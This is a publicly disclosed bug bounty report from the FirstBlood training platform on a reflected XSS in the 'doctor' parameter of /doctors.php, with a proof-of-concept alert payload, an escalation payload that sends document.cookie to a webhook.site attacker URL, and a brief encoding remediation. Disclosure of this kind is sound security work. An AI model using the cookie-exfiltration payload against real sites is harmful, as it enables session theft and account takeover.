Reflected XSS

FirstBlood-#1127 — Reflected XSS
This issue was discovered on FirstBlood v3

This report has been reviewed and accepted as a valid vulnerability on FirstBlood!

On 2022-12-08, pichik Level 4 reported:


Hello zseano,

hope you are doing well, thanks for the next event.
My first bug is reflected XSS in /doctors.php endpoint. There is parameter doctor which is reflected in between <script> tags.

Didnt find any better impact yet so reporting just simple alert. 
We just need to escape ' and separate our code, so it wont throw error.
Here is payload with simple alert : ';alert(1);'
POC LINK:
https://032ef87a17cb-pichik.a.firstbloodhackers.com/doctors.php?doctor=%27;alert(document.domain);%27
POC SCREEN:

IMPACT
As I found a way in, Iam increasing impact for this bug as it can be used in a way as my #1335 report.
Attacker can use this bug to append cookies to url, send them to his server and steal accounts of doctors.
Payload:

doctor=%27;window.location.href=%27https://webhook.site/[attacker-id]?%27%2Bdocument.cookie;%27
ACCOUNT TAKEOVER POC LINK:
https://ab26c404a3be-pichik.a.firstbloodhackers.com/doctors.php?doctor=%27;window.location.href=%27https://webhook.site/[attacker-id]?%27%2Bdocument.cookie;%27
Remediation:
HTML Encoding user entered input should prevent XSS easily.

This report has been publicly disclosed for everyone to view

P3 Medium

Endpoint: /doctors.php

Parameter: doctor

Payload: ';alert(1);'

FirstBlood ID: 47
Vulnerability Type: Reflective XSS

The endpoint /doctors.php is vulnerable to reflective XSS via the ?doctor= parameter

BugBountyHunter

POC LINK:

POC SCREEN:

IMPACT

ACCOUNT TAKEOVER POC LINK:

Remediation: